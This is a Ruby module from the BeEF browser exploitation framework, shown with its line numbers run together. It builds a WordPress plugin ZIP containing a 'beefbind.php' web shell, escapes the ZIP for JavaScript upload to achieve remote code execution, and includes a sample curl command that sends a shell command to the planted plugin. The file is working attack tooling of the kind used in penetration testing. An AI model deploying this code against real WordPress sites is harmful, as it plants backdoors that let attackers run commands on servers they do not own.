Path: blob/master/modules/misc/wordpress/upload_rce_plugin/module.rb
1154 views
#1# Copyright (c) Browser Exploitation Framework (BeEF) - https://beefproject.com2# See the file 'doc/COPYING' for copying permission3#4# This is a rewrite of the original module misc/wordpress_post_auth_rce.5#6# Original Author: Bart Leppens7# Rewritten by Erwan LR (@erwan_lr | WPScanTeam)8#9# To be executed, the request needs a BEEF header with the value of the auth_key option, example:10# curl -H 'BEEF: c9c3a2dcff54c5e2' -X POST --data 'cmd=id' http://wp.lab/wp-content/plugins/beefbind/beefbind.php11#1213require 'digest/sha1'14require_relative '../wordpress_command'1516class Wordpress_upload_rce_plugin < WordPressCommand17# Generate the plugin ZIP file as string. The method is called in the command.js.18# This allows easy modification of the beefbind.php to suit the needs, as well as being automatically generated19# even when the module is used with automated rules20def self.generate_zip_payload(auth_key)21stringio = Zip::OutputStream.write_buffer do |zio|22zio.put_next_entry('beefbind.php')2324file_content = File.read(File.join(File.dirname(__FILE__), 'beefbind.php')).to_s25file_content.gsub!(/#SHA1HASH#/, Digest::SHA1.hexdigest(auth_key))2627zio.write(file_content)28end2930stringio.rewind3132payload = stringio.sysread33escaped_payload = ''3435# Escape payload to be able to put it in the JS36payload.each_byte do |byte|37escaped_payload << ("\\#{'x%02X' % byte}")38end3940escaped_payload41end4243def self.options44super() + [45{ 'name' => 'auth_key', 'ui_label' => 'Auth Key', 'value' => SecureRandom.hex(8) }46]47end48end495051